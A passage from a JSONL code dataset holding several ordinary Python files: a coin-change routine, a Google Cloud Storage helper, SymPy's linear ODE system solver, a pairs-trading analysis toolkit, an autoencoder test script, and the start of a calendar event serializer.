memo[remaining_amount] >= 0:\n return memo[remaining_amount]\n else:\n min_coins = float(\"inf\")\n for coin in coins:\n if coin <= remaining_amount:\n result = make_change(coins, remaining_amount - coin, memo)\n min_coins = min(min_coins, result + 1)\n memo[remaining_amount] = min_coins\n return memo[remaining_amount]\n","repo_name":"EricMontague/Datastructures-and-Algorithms","sub_path":"dynammic_programming/min_coins_to_make_change.py","file_name":"min_coins_to_make_change.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23013928565","text":"import os\nimport asyncio\nfrom google.cloud import storage\nfrom google.oauth2 import service_account\nfrom app.config import settings\nimport base64\nclass ServiceBucket:\n key_path = \"app/key/service-account-file.json\"\n credentials = service_account.Credentials.from_service_account_file(key_path)\n storage_client = storage.Client(credentials=credentials)\n\n @staticmethod\n async def upload_blob_async(destination_blob_name, contents):\n try:\n bucket = ServiceBucket.storage_client.bucket(settings.BUCKET_NAME)\n blob = bucket.blob(destination_blob_name)\n\n loop = asyncio.get_event_loop()\n await loop.run_in_executor(None, blob.upload_from_string, contents)\n return True\n except Exception as e:\n print(e)\n return False\n \n @staticmethod\n async def get_file_by_route(blob_name):\n try:\n bucket = ServiceBucket.storage_client.bucket(settings.BUCKET_NAME)\n blob = bucket.blob(blob_name)\n\n loop = asyncio.get_event_loop()\n bytes_data = await loop.run_in_executor(None, blob.download_as_bytes)\n content_type = blob.content_type\n return {\n 'file_bytes': bytes_data,\n 'content_type': content_type,\n 'file_name': blob_name\n }\n except Exception as e:\n print(e)\n return {\n 'file_bytes': None,\n 'content_type': None,\n 'file_name': None\n }\n\n\n @staticmethod\n async def delete_file_by_route(blob_name):\n \n \n try:\n bucket = ServiceBucket.storage_client.bucket(settings.BUCKET_NAME)\n blob = bucket.blob(blob_name)\n\n loop = asyncio.get_event_loop()\n await loop.run_in_executor(None, blob.delete)\n return True\n except Exception as e:\n print(e)\n return False\n @staticmethod\n async def download_blobs_in_folder(folder_path):\n try:\n bucket = ServiceBucket.storage_client.bucket(settings.BUCKET_NAME)\n blobs = list(bucket.list_blobs(prefix=folder_path))\n files_data = []\n\n loop = asyncio.get_event_loop()\n\n for blob in blobs:\n bytes_data = await loop.run_in_executor(None, blob.download_as_bytes)\n base64_encoded_data = base64.b64encode(bytes_data).decode()\n files_data.append({\n 'file_base64': base64_encoded_data,\n 'content_type': blob.content_type,\n 'file_name': blob.name.split('/')[-1]\n })\n\n return files_data\n except Exception as e:\n print(e)\n return []\n\nservice_bucket = ServiceBucket()\n","repo_name":"DanielaMGX/server-cultural-events-management-system-","sub_path":"app/services/bucket.py","file_name":"bucket.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36218151503","text":"from sympy import (Derivative, Symbol)\nfrom sympy.core.numbers import I\nfrom sympy.core.relational import Eq\nfrom sympy.core.symbol import Dummy\nfrom sympy.functions import exp, im, cos, sin, re\nfrom sympy.functions.combinatorial.factorials import factorial\nfrom sympy.matrices import zeros, Matrix\nfrom sympy.simplify import simplify, collect\nfrom sympy.solvers.deutils import ode_order\nfrom sympy.solvers.solveset import NonlinearError\nfrom sympy.utilities import numbered_symbols, default_sort_key\nfrom sympy.utilities.iterables import ordered, uniq\n\n\ndef _get_func_order(eqs, funcs):\n return {func: max(ode_order(eq, func) for eq in eqs) for func in funcs}\n\n\nclass ODEOrderError(ValueError):\n \"\"\"Raised by linear_ode_to_matrix if the system has the wrong order\"\"\"\n pass\n\n\nclass ODENonlinearError(NonlinearError):\n \"\"\"Raised by linear_ode_to_matrix if the system is nonlinear\"\"\"\n pass\n\n\ndef linear_ode_to_matrix(eqs, funcs, t, order):\n r\"\"\"\n Convert a linear system of ODEs to matrix form\n\n Explanation\n ===========\n\n Express a system of linear ordinary differential equations as a single\n matrix differential equation [1]. For example the system $x' = x + y + 1$\n and $y' = x - y$ can be represented as\n\n .. math:: A_1 X' + A_0 X = b\n\n where $A_1$ and $A_0$ are $2 \\times 2$ matrices and $b$, $X$ and $X'$ are\n $2 \\times 1$ matrices with $X = [x, y]^T$.\n\n Higher-order systems are represented with additional matrices e.g. a\n second-order system would look like\n\n .. math:: A_2 X'' + A_1 X' + A_0 X = b\n\n Examples\n ========\n\n >>> from sympy import (Function, Symbol, Matrix, Eq)\n >>> from sympy.solvers.ode.systems import linear_ode_to_matrix\n >>> t = Symbol('t')\n >>> x = Function('x')\n >>> y = Function('y')\n\n We can create a system of linear ODEs like\n\n >>> eqs = [\n ... Eq(x(t).diff(t), x(t) + y(t) + 1),\n ... Eq(y(t).diff(t), x(t) - y(t)),\n ... ]\n >>> funcs = [x(t), y(t)]\n >>> order = 1 # 1st order system\n\n Now ``linear_ode_to_matrix`` can represent this as a matrix\n differential equation.\n\n >>> (A1, A0), b = linear_ode_to_matrix(eqs, funcs, t, order)\n >>> A1\n Matrix([\n [1, 0],\n [0, 1]])\n >>> A0\n Matrix([\n [-1, -1],\n [-1, 1]])\n >>> b\n Matrix([\n [1],\n [0]])\n\n The original equations can be recovered from these matrices:\n\n >>> eqs_mat = Matrix([eq.lhs - eq.rhs for eq in eqs])\n >>> X = Matrix(funcs)\n >>> A1 * X.diff(t) + A0 * X - b == eqs_mat\n True\n\n If the system of equations has a maximum order greater than the\n order of the system specified, a ODEOrderError exception is raised.\n\n >>> eqs = [Eq(x(t).diff(t, 2), x(t).diff(t) + x(t)), Eq(y(t).diff(t), y(t) + x(t))]\n >>> linear_ode_to_matrix(eqs, funcs, t, 1)\n Traceback (most recent call last):\n ...\n ODEOrderError: Cannot represent system in 1-order form\n\n If the system of equations is nonlinear, then ODENonlinearError is\n raised.\n\n >>> eqs = [Eq(x(t).diff(t), x(t) + y(t)), Eq(y(t).diff(t), y(t)**2 + x(t))]\n >>> linear_ode_to_matrix(eqs, funcs, t, 1)\n Traceback (most recent call last):\n ...\n ODENonlinearError: The system of ODEs is nonlinear.\n\n Parameters\n ==========\n\n eqs : list of sympy expressions or equalities\n The equations as expressions (assumed equal to zero).\n funcs : list of applied functions\n The dependent variables of the system of ODEs.\n t : symbol\n The independent variable.\n order : int\n The order of the system of ODEs.\n\n Returns\n =======\n\n The tuple ``(As, b)`` where ``As`` is a tuple of matrices and ``b`` is the\n the matrix representing the rhs of the matrix equation.\n\n Raises\n ======\n\n ODEOrderError\n When the system of ODEs have an order greater than what was specified\n ODENonlinearError\n When the system of ODEs is nonlinear\n\n See Also\n ========\n\n linear_eq_to_matrix: for systems of linear algebraic equations.\n\n References\n ==========\n\n .. [1] https://en.wikipedia.org/wiki/Matrix_differential_equation\n\n \"\"\"\n from sympy.solvers.solveset import linear_eq_to_matrix\n\n if any(ode_order(eq, func) > order for eq in eqs for func in funcs):\n msg = \"Cannot represent system in {}-order form\"\n raise ODEOrderError(msg.format(order))\n\n As = []\n\n for o in range(order, -1, -1):\n # Work from the highest derivative down\n funcs_deriv = [func.diff(t, o) for func in funcs]\n\n # linear_eq_to_matrix expects a proper symbol so substitute e.g.\n # Derivative(x(t), t) for a Dummy.\n rep = {func_deriv: Dummy() for func_deriv in funcs_deriv}\n eqs = [eq.subs(rep) for eq in eqs]\n syms = [rep[func_deriv] for func_deriv in funcs_deriv]\n\n # Ai is the matrix for X(t).diff(t, o)\n # eqs is minus the remainder of the equations.\n try:\n Ai, b = linear_eq_to_matrix(eqs, syms)\n except NonlinearError:\n raise ODENonlinearError(\"The system of ODEs is nonlinear.\")\n\n As.append(Ai)\n if o:\n eqs = [-eq for eq in b]\n else:\n rhs = b\n\n return As, rhs\n\n\ndef matrix_exp(A, t):\n r\"\"\"\n Matrix exponential $\\exp(A*t)$ for the matrix ``A`` and scalar ``t``.\n\n Explanation\n ===========\n\n This functions returns the $\\exp(A*t)$ by doing a simple\n matrix multiplication:\n\n .. math:: \\exp(A*t) = P * expJ * P^{-1}\n\n where $expJ$ is $\\exp(J*t)$. $J$ is the Jordan normal\n form of $A$ and $P$ is matrix such that:\n\n .. math:: A = P * J * P^{-1}\n\n The matrix exponential $\\exp(A*t)$ appears in the solution of linear\n differential equations. For example if $x$ is a vector and $A$ is a matrix\n then the initial value problem\n\n .. math:: \\frac{dx(t)}{dt} = A \\times x(t), x(0) = x0\n\n has the unique solution\n\n .. math:: x(t) = \\exp(A t) x0\n\n Examples\n ========\n\n >>> from sympy import Symbol, Matrix, pprint\n >>> from sympy.solvers.ode.systems import matrix_exp\n >>> t = Symbol('t')\n\n We will consider a 2x2 matrix for comupting the exponential\n\n >>> A = Matrix([[2, -5], [2, -4]])\n >>> pprint(A)\n [2 -5]\n [ ]\n [2 -4]\n\n Now, exp(A*t) is given as follows:\n\n >>> pprint(matrix_exp(A, t))\n [ -t -t -t ]\n [3*e *sin(t) + e *cos(t) -5*e *sin(t) ]\n [ ]\n [ -t -t -t ]\n [ 2*e *sin(t) - 3*e *sin(t) + e *cos(t)]\n\n Parameters\n ==========\n\n A : Matrix\n The matrix $A$ in the expression $\\exp(A*t)$\n t : Symbol\n The independent variable\n\n See Also\n ========\n\n matrix_exp_jordan_form: For exponential of Jordan normal form\n\n References\n ==========\n\n .. [1] https://en.wikipedia.org/wiki/Jordan_normal_form\n .. [2] https://en.wikipedia.org/wiki/Matrix_exponential\n\n \"\"\"\n P, expJ = matrix_exp_jordan_form(A, t)\n return P * expJ * P.inv()\n\n\ndef matrix_exp_jordan_form(A, t):\n r\"\"\"\n Matrix exponential $\\exp(A*t)$ for the matrix *A* and scalar *t*.\n\n Explanation\n ===========\n\n Returns the Jordan form of the $\\exp(A*t)$ along with the matrix $P$ such that:\n\n .. math::\n \\exp(A*t) = P * expJ * P^{-1}\n\n Examples\n ========\n\n >>> from sympy import Matrix, Symbol\n >>> from sympy.solvers.ode.systems import matrix_exp, matrix_exp_jordan_form\n >>> t = Symbol('t')\n\n We will consider a 2x2 defective matrix. This shows that our method\n works even for defective matrices.\n\n >>> A = Matrix([[1, 1], [0, 1]])\n\n It can be observed that this function gives us the Jordan normal form\n and the required invertible matrix P.\n\n >>> P, expJ = matrix_exp_jordan_form(A, t)\n\n Here, it is shown that P and expJ returned by this function is correct\n as they satisfy the formula: P * expJ * P_inverse = exp(A*t).\n\n >>> P * expJ * P.inv() == matrix_exp(A, t)\n True\n\n Parameters\n ==========\n\n A : Matrix\n The matrix $A$ in the expression $\\exp(A*t)$\n t : Symbol\n The independent variable\n\n References\n ==========\n\n .. [1] https://en.wikipedia.org/wiki/Defective_matrix\n .. [2] https://en.wikipedia.org/wiki/Jordan_matrix\n .. [3] https://en.wikipedia.org/wiki/Jordan_normal_form\n\n \"\"\"\n\n N, M = A.shape\n if N != M:\n raise ValueError('Needed square matrix but got shape (%s, %s)' % (N, M))\n elif A.has(t):\n raise ValueError('Matrix A should not depend on t')\n\n def jordan_chains(A):\n '''Chains from Jordan normal form analogous to M.eigenvects().\n Returns a dict with eignevalues as keys like:\n {e1: [[v111,v112,...], [v121, v122,...]], e2:...}\n where vijk is the kth vector in the jth chain for eigenvalue i.\n '''\n P, blocks = A.jordan_cells()\n basis = [P[:,i] for i in range(P.shape[1])]\n n = 0\n chains = {}\n for b in blocks:\n eigval = b[0, 0]\n size = b.shape[0]\n if eigval not in chains:\n chains[eigval] = []\n chains[eigval].append(basis[n:n+size])\n n += size\n return chains\n\n eigenchains = jordan_chains(A)\n\n # Needed for consistency across Python versions:\n eigenchains_iter = sorted(eigenchains.items(), key=default_sort_key)\n isreal = not A.has(I)\n\n blocks = []\n vectors = []\n seen_conjugate = set()\n for e, chains in eigenchains_iter:\n for chain in chains:\n n = len(chain)\n if isreal and e != e.conjugate() and e.conjugate() in eigenchains:\n if e in seen_conjugate:\n continue\n seen_conjugate.add(e.conjugate())\n exprt = exp(re(e) * t)\n imrt = im(e) * t\n imblock = Matrix([[cos(imrt), sin(imrt)],\n [-sin(imrt), cos(imrt)]])\n expJblock2 = Matrix(n, n, lambda i,j:\n imblock * t**(j-i) / factorial(j-i) if j >= i\n else zeros(2, 2))\n expJblock = Matrix(2*n, 2*n, lambda i,j: expJblock2[i//2,j//2][i%2,j%2])\n\n blocks.append(exprt * expJblock)\n for i in range(n):\n vectors.append(re(chain[i]))\n vectors.append(im(chain[i]))\n else:\n vectors.extend(chain)\n fun = lambda i,j: t**(j-i)/factorial(j-i) if j >= i else 0\n expJblock = Matrix(n, n, fun)\n blocks.append(exp(e * t) * expJblock)\n\n expJ = Matrix.diag(*blocks)\n P = Matrix(N, N, lambda i,j: vectors[j][i])\n\n return P, expJ\n\n\ndef _neq_linear_first_order_const_coeff_homogeneous(match_):\n r\"\"\"\n System of n first-order constant-coefficient linear homogeneous differential equations\n\n .. math:: y'_k = a_{k1} y_1 + a_{k2} y_2 +...+ a_{kn} y_n; k = 1,2,...,n\n\n or that can be written as `\\vec{y'} = A . \\vec{y}`\n where `\\vec{y}` is matrix of `y_k` for `k = 1,2,...n` and `A` is a `n \\times n` matrix.\n\n Since these equations are equivalent to a first order homogeneous linear\n differential equation. So the general solution will contain `n` linearly\n independent parts and solution will consist some type of exponential\n functions. Assuming `y = \\vec{v} e^{rt}` is a solution of the system where\n `\\vec{v}` is a vector of coefficients of `y_1,...,y_n`. Substituting `y` and\n `y' = r v e^{r t}` into the equation `\\vec{y'} = A . \\vec{y}`, we get\n\n .. math:: r \\vec{v} e^{rt} = A \\vec{v} e^{rt}\n\n .. math:: r \\vec{v} = A \\vec{v}\n\n where `r` comes out to be eigenvalue of `A` and vector `\\vec{v}` is the eigenvector\n of `A` corresponding to `r`. There are three possibilities of eigenvalues of `A`\n\n - `n` distinct real eigenvalues\n - complex conjugate eigenvalues\n - eigenvalues with multiplicity `k`\n\n 1. When all eigenvalues `r_1,..,r_n` are distinct with `n` different eigenvectors\n `v_1,...v_n` then the solution is given by\n\n .. math:: \\vec{y} = C_1 e^{r_1 t} \\vec{v_1} + C_2 e^{r_2 t} \\vec{v_2} +...+ C_n e^{r_n t} \\vec{v_n}\n\n where `C_1,C_2,...,C_n` are arbitrary constants.\n\n 2. When some eigenvalues are complex then in order to make the solution real,\n we take a linear combination: if `r = a + bi` has an eigenvector\n `\\vec{v} = \\vec{w_1} + i \\vec{w_2}` then to obtain real-valued solutions to\n the system, replace the complex-valued solutions `e^{rx} \\vec{v}`\n with real-valued solution `e^{ax} (\\vec{w_1} \\cos(bx) - \\vec{w_2} \\sin(bx))`\n and for `r = a - bi` replace the solution `e^{-r x} \\vec{v}` with\n `e^{ax} (\\vec{w_1} \\sin(bx) + \\vec{w_2} \\cos(bx))`\n\n 3. If some eigenvalues are repeated. Then we get fewer than `n` linearly\n independent eigenvectors, we miss some of the solutions and need to\n construct the missing ones. We do this via generalized eigenvectors, vectors\n which are not eigenvectors but are close enough that we can use to write\n down the remaining solutions. For a eigenvalue `r` with eigenvector `\\vec{w}`\n we obtain `\\vec{w_2},...,\\vec{w_k}` using\n\n .. math:: (A - r I) . \\vec{w_2} = \\vec{w}\n\n .. math:: (A - r I) . \\vec{w_3} = \\vec{w_2}\n\n .. math:: \\vdots\n\n .. math:: (A - r I) . \\vec{w_k} = \\vec{w_{k-1}}\n\n Then the solutions to the system for the eigenspace are `e^{rt} [\\vec{w}],\n e^{rt} [t \\vec{w} + \\vec{w_2}], e^{rt} [\\frac{t^2}{2} \\vec{w} + t \\vec{w_2} + \\vec{w_3}],\n ...,e^{rt} [\\frac{t^{k-1}}{(k-1)!} \\vec{w} + \\frac{t^{k-2}}{(k-2)!} \\vec{w_2} +...+ t \\vec{w_{k-1}}\n + \\vec{w_k}]`\n\n So, If `\\vec{y_1},...,\\vec{y_n}` are `n` solution of obtained from three\n categories of `A`, then general solution to the system `\\vec{y'} = A . \\vec{y}`\n\n .. math:: \\vec{y} = C_1 \\vec{y_1} + C_2 \\vec{y_2} + \\cdots + C_n \\vec{y_n}\n\n \"\"\"\n eq = match_['eq']\n func = match_['func']\n fc = match_['func_coeff']\n n = len(eq)\n t = list(list(eq[0].atoms(Derivative))[0].atoms(Symbol))[0]\n constants = numbered_symbols(prefix='C', cls=Symbol, start=1)\n\n # This needs to be modified in future so that fc is only of type Matrix\n M = -fc if type(fc) is Matrix else Matrix(n, n, lambda i,j:-fc[i,func[j],0])\n\n P, J = matrix_exp_jordan_form(M, t)\n P = simplify(P)\n Cvect = Matrix(list(next(constants) for _ in range(n)))\n sol_vector = P * (J * Cvect)\n\n sol_vector = [collect(s, ordered(J.atoms(exp)), exact=True) for s in sol_vector]\n\n sol_dict = [Eq(func[i], sol_vector[i]) for i in range(n)]\n return sol_dict\n\n\ndef _matrix_is_constant(M, t):\n \"\"\"Checks if the matrix M is independent of t or not.\"\"\"\n return all(coef.as_independent(t, as_Add=True)[1] == 0 for coef in M)\n\n\ndef _canonical_equations(eqs, funcs, t):\n \"\"\"Helper function that solves for first order derivatives in a system\"\"\"\n from sympy.solvers.solvers import solve\n\n # For now the system of ODEs dealt by this function can have a\n # maximum order of 1.\n if any(ode_order(eq, func) > 1 for eq in eqs for func in funcs):\n msg = \"Cannot represent system in {}-order canonical form\"\n raise ODEOrderError(msg.format(1))\n\n canon_eqs = solve(eqs, *[func.diff(t) for func in funcs], dict=True)\n\n if len(canon_eqs) != 1:\n raise ODENonlinearError(\"System of ODEs is nonlinear\")\n\n canon_eqs = canon_eqs[0]\n canon_eqs = [Eq(func.diff(t), canon_eqs[func.diff(t)]) for func in funcs]\n\n return canon_eqs\n\n\ndef neq_nth_linear_constant_coeff_match(eqs, funcs, t):\n r\"\"\"\n Returns a dictionary with details of the eqs if every equation is constant coefficient\n and linear else returns None\n\n Explanation\n ===========\n\n This function takes the eqs, converts it into a form Ax = b where x is a vector of terms\n containing dependent variables and their derivatives till their maximum order. If it is\n possible to convert eqs into Ax = b, then all the equations in eqs are linear otherwise\n they are non-linear.\n\n To check if the equations are constant coefficient, we need to check if all the terms in\n A obtained above are constant or not.\n\n To check if the equations are homogeneous or not, we need to check if b is a zero matrix\n or not.\n\n Parameters\n ==========\n\n eqs: List\n List of ODEs\n funcs: List\n List of dependent variables\n t: Symbol\n Independent variable of the equations in eqs\n\n Returns\n =======\n\n match = {\n 'no_of_equation': len(eqs),\n 'eq': eqs,\n 'func': funcs,\n 'order': order,\n 'is_linear': is_linear,\n 'is_constant': is_constant,\n 'is_homogeneous': is_homogeneous,\n }\n\n Dict or None\n Dict with values for keys:\n 1. no_of_equation: Number of equations\n 2. eq: The set of equations\n 3. func: List of dependent variables\n 4. order: A dictionary that gives the order of the\n dependent variable in eqs\n 5. is_linear: Boolean value indicating if the set of\n equations are linear or not.\n 6. is_constant: Boolean value indicating if the set of\n equations have constant coefficients or not.\n 7. is_homogeneous: Boolean value indicating if the set of\n equations are homogeneous or not.\n This Dict is the answer returned if the eqs are linear and constant\n coefficient. Otherwise, None is returned.\n\n \"\"\"\n\n # Error for i == 0 can be added but isn't for now\n\n # Removing the duplicates from the list of funcs\n # meanwhile maintaining the order. This is done\n # since the line in classify_sysode: list(set(funcs)\n # cause some test cases to fail when gives different\n # results in different versions of Python.\n funcs = list(uniq(funcs))\n\n # Check for len(funcs) == len(eqs)\n if len(funcs) != len(eqs):\n raise ValueError(\"Number of functions given is not equal to the number of equations %s\" % funcs)\n\n # ValueError when functions have more than one arguments\n for func in funcs:\n if len(func.args) != 1:\n raise ValueError(\"dsolve() and classify_sysode() work with \"\n \"functions of one variable only, not %s\" % func)\n\n # Getting the func_dict and order using the helper\n # function\n order = _get_func_order(eqs, funcs)\n\n if not all(order[func] == 1 for func in funcs):\n return None\n else:\n\n # TO be changed when this function is updated.\n # This will in future be updated as the maximum\n # order in the system found.\n system_order = 1\n\n # Not adding the check if the len(func.args) for\n # every func in funcs is 1\n\n # Linearity check\n try:\n canon_eqs = _canonical_equations(eqs, funcs, t)\n As, b = linear_ode_to_matrix(canon_eqs, funcs, t, system_order)\n\n # When the system of ODEs is non-linear, an ODENonlinearError is raised.\n # When system has an order greater than what is specified in system_order,\n # ODEOrderError is raised.\n # This function catches these errors and None is returned\n except (ODEOrderError, ODENonlinearError):\n return None\n\n A = As[1]\n is_linear = True\n\n # Constant coefficient check\n is_constant = _matrix_is_constant(A, t)\n\n # Homogeneous check\n is_homogeneous = True if b.is_zero_matrix else False\n\n match = {\n 'no_of_equation': len(eqs),\n 'eq': eqs,\n 'func': funcs,\n 'order': order,\n 'is_linear': is_linear,\n 'is_constant': is_constant,\n 'is_homogeneous': is_homogeneous,\n }\n\n # The match['is_linear'] check will be added in the future when this\n # function becomes ready to deal with non-linear systems of ODEs\n if match['is_constant']:\n\n # Converting the equation into canonical form if the\n # equation is first order. There will be a separate\n # function for this in the future.\n if all([order[func] == 1 for func in funcs]) and match['is_homogeneous']:\n match['func_coeff'] = A\n match['type_of_equation'] = \"type1\"\n\n return match\n\n return None\n","repo_name":"PandeyAditya14/Audio-Encryption","sub_path":"venv/lib/python3.8/site-packages/sympy/solvers/ode/systems.py","file_name":"systems.py","file_ext":"py","file_size_in_byte":20323,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"19687687251","text":"from statsmodels.tsa.stattools import coint\nimport sys\nsys.path.append(\"../quant\")\nfrom alphabeta_regression import normal_equation\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport backtrader as bt\nfrom backtrader.indicators import PeriodN\nimport json\n\nclass PairChecker:\n\n\n def __init__(self, cluster, cluster_dataframe):\n\n self.cluster = cluster\n self.cluster_size = len(cluster)\n self.data = cluster_dataframe\n self.pairs = []\n\n def check_cointegration(self, cutoff=0.05, hurst_threshold=0.5):\n \"\"\"Carry out augmented dicky-fuller test on X\"\"\"\n number_of_checks = 0\n for i in range(self.cluster_size):\n for j in range(i+1, self.cluster_size):\n number_of_checks = number_of_checks + 1\n\n try:\n print(f\"Checking for cointegration between {self.cluster[i]}--{self.cluster[j]}\")\n\n S1 = self.data.iloc[:, i]\n S2 = self.data.iloc[:, j]\n \n alpha, beta = normal_equation(S2.values.reshape(-1,1), S1.values.reshape(-1,1))\n spread = S2 - beta * S1\n\n p_value = coint(S1,S2)[1]\n\n if(p_value) > cutoff:\n pass\n #print(\"Series is unlikely cointegrated\")\n else:\n hurst_value = self.check_hurst(spread)\n \n if hurst_value < hurst_threshold:\n halflife_value = self.check_half_life(spread)\n print(halflife_value)\n if halflife_value > 1 and halflife_value < 100:\n #print(\"Series is likely cointegrated\")\n self.pairs.append( [self.cluster[i], self.cluster[j]])\n\n except Exception as e:\n print(e)\n #print(\"Error...\")\n \n return self.pairs, number_of_checks\n\n def check_hurst(self, spread):\n spread = spread.values\n\n lags = range(2,100)\n #tau = [np.sqrt(np.std(np.subtract(spread[lag:], spread[:-lag]))) for lag in lags]\n \n #poly = np.polyfit(np.log(lags), np.log(tau), 1)\n\n variancetau = []; tau = []\n\n for lag in lags: \n tau.append(lag)\n\n pp = np.subtract(spread[lag:], spread[:-lag]) \n variancetau.append(np.var(pp))\n \n m = np.polyfit(np.log(tau),np.log(variancetau),1)\n\n\n hurst = m[0] / 2\n\n\n return hurst\n\n return poly[0] * 2.0\n\n def check_half_life(self, spread):\n spread = spread.values\n spread_lag = np.roll(spread, 1)\n spread_lag[0] = 0\n spread_ret = spread - spread_lag\n spread_ret[0] = 0\n\n alpha, beta = normal_equation(spread_ret[1:].reshape(-1,1), spread_lag[1:].reshape(-1,1))\n halflife = -np.log(2) / beta\n\n return halflife\n\n\n\nclass OLS_Slope_InterceptN(PeriodN):\n '''\n Calculates a linear regression using ``statsmodel.OLS`` (Ordinary least\n squares) of data1 on data0\n Uses ``pandas`` and ``statsmodels``\n '''\n _mindatas = 2 # ensure at least 2 data feeds are passed\n\n packages = (\n ('pandas', 'pd'),\n ('statsmodels.api', 'sm'),\n )\n lines = ('slope', 'intercept',)\n params = (\n ('period', 10),\n )\n\n def next(self):\n p0 = pd.Series(self.data0.get(size=len(self.data0))).values\n p1 = pd.Series(self.data1.get(size=len(self.data1))).values\n\n #alpha, beta = normal_equation(p1.reshape(-1,1), p0.reshape(-1,1))\n p1 = sm.add_constant(p1)\n intercept, slope = sm.OLS(p0, p1).fit().params\n \n\n self.lines.slope[0] = intercept\n self.lines.intercept[0] = slope\n\n\nclass OLS_TransformationN(PeriodN):\n '''\n Calculates the ``zscore`` for data0 and data1. Although it doesn't directly\n uses any external package it relies on ``OLS_SlopeInterceptN`` which uses\n ``pandas`` and ``statsmodels``\n '''\n _mindatas = 2 # ensure at least 2 data feeds are passed\n lines = ('spread', 'spread_mean', 'spread_std', 'zscore',)\n params = (('period', 10),)\n\n def __init__(self):\n slint = OLS_Slope_InterceptN(*self.datas)\n\n spread = self.data0 - (slint.slope * self.data1 + slint.intercept)\n self.l.spread = spread\n\n self.l.spread_mean = bt.ind.SMA(spread, period=self.p.period)\n self.l.spread_std = bt.ind.StdDev(spread, period=self.p.period)\n self.l.zscore = (spread - self.l.spread_mean) / self.l.spread_std\n\n\nclass TradeAnalyzer:\n\n def __init__(self, analyzer_list):\n self.summary_dict = dict(analyzer_list.get_analysis().lvalues()[0])\n self.win_loss_dict = dict(analyzer_list.get_analysis().lvalues()[1])\n self.win_trades = dict(analyzer_list.get_analysis().lvalues()[3])\n self.loss_trades = dict(analyzer_list.get_analysis().lvalues()[4])\n\n\n def get_summary(self):\n return self.summary_dict\n\n def get_streak(self):\n x = [{i:dict(self.win_loss_dict[i])} for i in self.win_loss_dict]\n return x[0],x[1]\n\n def get_wins(self):\n win_trades_info = dict(self.win_trades['pnl'])\n win_trades_info['number'] = self.win_trades['total']\n win_trades_info['type'] = 'wins'\n\n return win_trades_info\n\n def get_losses(self):\n loss_trades_info = dict(self.loss_trades['pnl'])\n loss_trades_info['number'] = self.loss_trades['total']\n loss_trades_info['type'] = 'losses'\n return loss_trades_info\n\n\n\n","repo_name":"ChetanTayal138/Trading-Toolkit","sub_path":"backtester/utils/pairs.py","file_name":"pairs.py","file_ext":"py","file_size_in_byte":5624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"5626750419","text":"#! /Users/zellyn/.ve/np/bin/python\n\nfrom train import *\n\npatchsize = 8\nvisible_size = patchsize * patchsize\nhidden_size = 25\ntarget_activation = 0.01\nlamb = 0.0001\nbeta = 3\n\ntheta = sio.loadmat('testdata/save_theta.mat')['theta']\npatches = sio.loadmat('testdata/save_patches.mat')['patches']\n\ndef sal(theta):\n return sparse_autoencoder_loss(theta, visible_size, hidden_size, lamb, target_activation, beta, patches)\nopttheta, f, d = scipy.optimize.fmin_l_bfgs_b(sal, theta, maxfun=3000, iprint=1, m=theta.size)\n\nsio.savemat('testdata/numpy-opttheta.mat', {'opttheta' : opttheta})\n","repo_name":"zellyn/deeplearning-class-2011","sub_path":"ufldl/starter/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"81"} +{"seq_id":"24900030134","text":"from datetime import date, datetime\n\nfrom tzlocal import get_localzone_name\n\nfrom gcsa.event import Event\nfrom .base_serializer import BaseSerializer\nfrom .attachment_serializer import AttachmentSerializer\nfrom .attendee_serializer import AttendeeSerializer\nfrom .conference_serializer import ConferenceSolutionSerializer, ConferenceSolutionCreateRequestSerializer\nfrom .person_serializer import PersonSerializer\nfrom .reminder_serializer import ReminderSerializer\nfrom ..conference import ConferenceSolution, ConferenceSolutionCreateRequest\n\n\nclass EventSerializer(BaseSerializer):\n type_ = Event\n\n def __init__(self, event):\n super().__init__(event)\n\n @classmethod\n def _to_json(cls, event: Event):\n data = {\n 'id': event.event_id,\n 'summary': event.summary,\n 'description': event.description,\n 'location': event.location,\n 'recurrence': event.recurrence,\n 'colorId': event.color_id,\n 'visibility': event.visibility,\n 'attendees': [AttendeeSerializer.to_json(a) for a in event.attendees],\n 'guestsCanInviteOthers': event.guests_can_invite_others,\n 'guestsCanModify': event.guests_can_modify,\n 'guestsCanSeeOtherGuests': event.guests_can_see_other_guests,\n 'transparency': event.transparency,\n 'reminders': {\n 'useDefault': event.default_reminders,\n 'overrides': [ReminderSerializer.to_json(r) for r in event.reminders]\n },\n 'attachments': [AttachmentSerializer.to_json(a) for a in event.attachments],\n **event.other\n }\n\n if isinstance(event.start, datetime) and isinstance(event.end, datetime):\n data['start'] = {\n 'dateTime': event.start.isoformat(),\n 'timeZone': event.timezone\n }\n data['end'] = {\n 'dateTime': event.end.isoformat(),\n 'timeZone': event.timezone\n }\n elif isinstance(event.start, date) and isinstance(event.end, date):\n data['start'] = {'date': event.start.isoformat()}\n data['end'] = {'date': event.end.isoformat()}\n\n if event.default_reminders:\n data['reminders'] = {\n 'useDefault': True\n }\n else:\n data['reminders'] = {\n 'useDefault': False\n }\n if event.reminders:\n data['reminders']['overrides'] = [ReminderSerializer.to_json(r) for r in event.reminders]\n\n if event.conference_solution is not None:\n if isinstance(event.conference_solution, ConferenceSolution):\n data['conferenceData'] = ConferenceSolutionSerializer.to_json(event.conference_solution)\n elif isinstance(event.conference_solution, ConferenceSolutionCreateRequest):\n data['conferenceData'] = ConferenceSolutionCreateRequestSerializer.to_json(event.conference_solution)\n\n data = EventSerializer._remove_empty_values(data)\n\n return data\n\n @staticmethod\n def _to_object(json_event):\n timezone = None\n\n start = None\n start_data = json_event.pop('start', None)\n if start_data is not None:\n if 'date' in start_data:\n start = EventSerializer._get_datetime_from_string(start_data['date']).date()\n else:\n start = EventSerializer._get_datetime_from_string(start_data['dateTime'])\n timezone = start_data.get('timeZone', get_localzone_name())\n\n end = None\n end_data = json_event.pop('end', None)\n if end_data is not None:\n if 'date' in end_data:\n end = 